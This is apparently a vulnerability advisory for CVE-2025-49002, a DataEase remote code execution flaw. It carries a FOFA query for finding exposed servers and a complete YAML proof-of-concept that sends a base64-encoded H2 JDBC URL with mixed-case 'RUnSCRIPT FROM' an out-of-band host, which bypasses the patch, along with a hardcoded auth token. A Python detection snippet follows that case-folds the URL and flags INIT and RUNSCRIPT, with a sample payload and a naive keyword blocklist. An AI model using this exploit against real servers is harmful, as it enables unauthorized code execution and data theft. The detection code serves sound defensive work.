CVE-2025-49002: DataEase Remote Code Execution Vulnerability

Date: 2025-09-01 | Affected software: DataEase | PoC: public

Vulnerability description

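CVE-2025-49002 arises because the H2 database module does not strictly filter user-supplied JDBC connection parameters, so the patch can be bypassed by varying letter case. Attackers can exploit these vulnerabilities to achieve unauthorized code execution, threatening the security of user data and systems.

fofa:body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"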

PoC code [public]

id: CVE-2025-49002

info:
  name: DataEase 远程代码执行漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数,可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行,威胁用户数据和系统的安全
    fofa:body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"
  reference:
    - https://github.com/dataease/dataease/security/advisories/GHSA-999m-jv2p-5h34
  tags: cve,cve2025,DataEase,rce
  created: 2025/6/11

set:
  oob: oob()
  oobHTTP: oob.HTTP
  hostname: request.url.host
  randstr: randomLowercase(8)
  cmd1: '{"dataBase":"","jdbc":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;init=RUnSCRIPT FROM '''
  cmd2: '''","urlType":"jdbcUrl","sshType":"password","extraParams":"","username":"123","password":"123","host":"","authMethod":"","port":0,"initialPoolSize":5,"minPoolSize":5,"maxPoolSize":5,"queryTimeout":30}'
  base64payload: base64(cmd1 + oobHTTP+ cmd2)

rules:
  r0:
    request:
      method: POST
      path: /de2api/datasource/validate
      headers:
        Content-Type: application/json
        X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
      body: |
        {
            "id": "",
            "name": "11",
            "description": "",
            "type": "h2",
            "apiConfiguration": [],
            "paramsConfiguration": [],
            "enableDataFill": false,
            "configuration": "{{base64payload}}"
        }
    expression: response.status == 200 && oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()
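
The following added example, not from the original page or the DataEase project, inspects a `/de2api/datasource/validate` request body the way a log or WAF rule could: it decodes the base64 `configuration`, case-folds the H2 JDBC URL, and flags the `INIT` setting and `RUNSCRIPT`. `naive_filter` is a hypothetical case-sensitive check shown for contrast, and the sample URLs are constructed.

```python
import base64
import json

# Constructed samples mirroring the request shape above; the host is a placeholder.
SAMPLE_JDBC = ("jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;"
               "init=RUnSCRIPT FROM 'http://collector.invalid/x.sql'")
BENIGN_JDBC = "jdbc:h2:mem:testdb;MODE=MySQL"


def make_body(jdbc: str) -> str:
    """Build a validate request body with a base64-encoded configuration."""
    config = json.dumps({"jdbc": jdbc, "urlType": "jdbcUrl"})
    encoded = base64.b64encode(config.encode()).decode()
    return json.dumps({"type": "h2", "configuration": encoded})


def naive_filter(jdbc: str) -> bool:
    """Hypothetical case-sensitive blocklist: the kind of check mixed case defeats."""
    return any(word in jdbc for word in ("INIT", "RUNSCRIPT"))


def h2_findings(jdbc: str) -> list[str]:
    """Case-insensitive inspection of an H2 JDBC URL's ';key=value' settings."""
    findings = []
    folded = jdbc.casefold()
    if not folded.startswith("jdbc:h2:"):
        return findings
    for setting in folded.split(";")[1:]:
        key, _, value = setting.partition("=")
        if key.strip() == "init":
            findings.append("INIT setting runs SQL at connect time")
        if "runscript" in value:
            findings.append("RUNSCRIPT in URL setting")
    return findings


def inspect_body(body: str) -> list[str]:
    """Decode a validate request body and return findings for its JDBC URL."""
    try:
        outer = json.loads(body)
        config = json.loads(base64.b64decode(outer["configuration"], validate=True))
        jdbc = str(config.get("jdbc", ""))
    except (ValueError, KeyError, TypeError, AttributeError):
        return ["unparseable configuration"]
    return h2_findings(jdbc)
```

The same case-folded comparison belongs in any server-side validation of the URL; an allowlist of permitted settings is stricter than a blocklist.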
